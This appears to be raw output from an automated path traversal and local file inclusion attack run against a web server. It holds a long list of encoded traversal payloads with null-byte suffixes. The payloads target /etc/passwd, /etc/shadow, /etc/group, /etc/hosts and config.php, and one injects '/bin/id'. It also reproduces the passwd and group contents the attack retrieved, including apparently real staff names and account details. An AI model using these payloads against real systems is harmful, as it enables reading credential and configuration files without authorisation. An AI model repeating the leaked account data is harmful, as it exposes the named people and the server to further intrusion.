- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00.php</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- mstrydom:x:533:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:307:
- ahps:x:303:
- nwschat:x:320:
- forecast:x:302:
- ndfd:x:306:
- nscanner:x:424:
- memcached:x:301:
- stapsys:x:157:
- <b>Query Used: ///////etc//passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /'%00.php</b>.<b>Query Used: /\,%ENV\,/%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>.<b>Query Used: /.....%0a%00.php</b>.<b>Query Used: /%2A%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /etc/passwd^^%00.php</b>.<b>Query Used: /etc/group%00.php</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,kmars,darnold,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:504:
- mstrydom:x:533:
- forecast:x:302:
- ahps:x:303:
- nwschat:x:320:
- nscanner:x:424:
- memcached:x:301:
- stapsys:x:157:
- <b>Query Used: \\\\\\\etc/\passwd%00.php</b>.<b>Query Used: /etc/shadow^^%00.php</b>.<b>Query Used: /bin/id|%00.php</b>.<b>Query Used: ././././././etc//passwd%00.php</b>.<b>Query Used: /..\..\..\..\..\..\etc/passwd%00.php</b>.<b>Query Used: /..\..\..\..\..\..\etc/shadow%00.php</b>.<b>Query Used: \.\.\.\.\.\.\etc/\passwd%00.php</b>.<b>Query Used: /./././././././././././etc/passwd%00.php</b>.<b>Query Used: /./././././././././././etc/shadow%00.php</b>.<b>Query Used: /./././././././././././etc/group%00.php</b>.<b>Query Used: ......etc/passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\group%00.php</b>.<b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00.php</b><b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00.php</b><b>Query Used: /%00//%00//%00//%00//%00//etc//shadow%00.php</b><b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/passwd%00.php</b>.<b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/shadow%00.php</b>.<b>Query Used: ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63%00.php</b>.<b>Query Used: ..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd%00.php</b>.<b>Query Used: ..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.etc/passwd%00.php</b>.<b>Query Used: etc/passwd%00.php</b>.<b>Query Used: etc/shadow%00.php</b>.<b>Query Used: %00.php</b>.<b>Query Used: %00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow%00.php</b>.<b>Query Used: .%5c..%5c/..%c0%9v..%5c.%5c..%5c/..%c0%9v%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.php</b>.<b>Query Used: ..%255c%00.php</b>.<b>Query Used: .%5c..%5c%00.php</b>.<b>Query Used: /..%c0%9v%00.php</b>.<b>Query Used: /%00.php</b>.<b>Query Used: /..%255c..%255c%00.php</b>.<b>Query Used: ///%00.php</b>.<b>Query Used: /..%255c..%255c/..%255c..%255c/..%255c..%255c%00.php</b>.<b>Query Used: ..%255c%00.php</b>.<b>Query Used: .%5c..%5c/..%c0%9v%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow%00.php</b>.<b>Query Used: ./\./\./\./\./\./\./etc/hosts%00.php</b>.<b>Query Used: \./\./\./\./\./\./\etc/\passwd%00.php</b>.<b>Query Used: \./\./\./\./\./\./\proc/\self/d/%00.php</b>.<b>Query Used: /////config.php%00.php</b>.<b>Query Used: ..\/..\/..\/..\/config.php%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00.php</b>.<b>Query Used: config.php%00.php</b>.<b>Query Used: ..%25%35%63..%25%35%63..%25%35%63config.php%00.php</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php%00.php</b>.<b>Query Used: %00.php.inc</b><b>Query Used: etc/hosts%00.php.inc</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
- ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
- <b>Query Used: etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
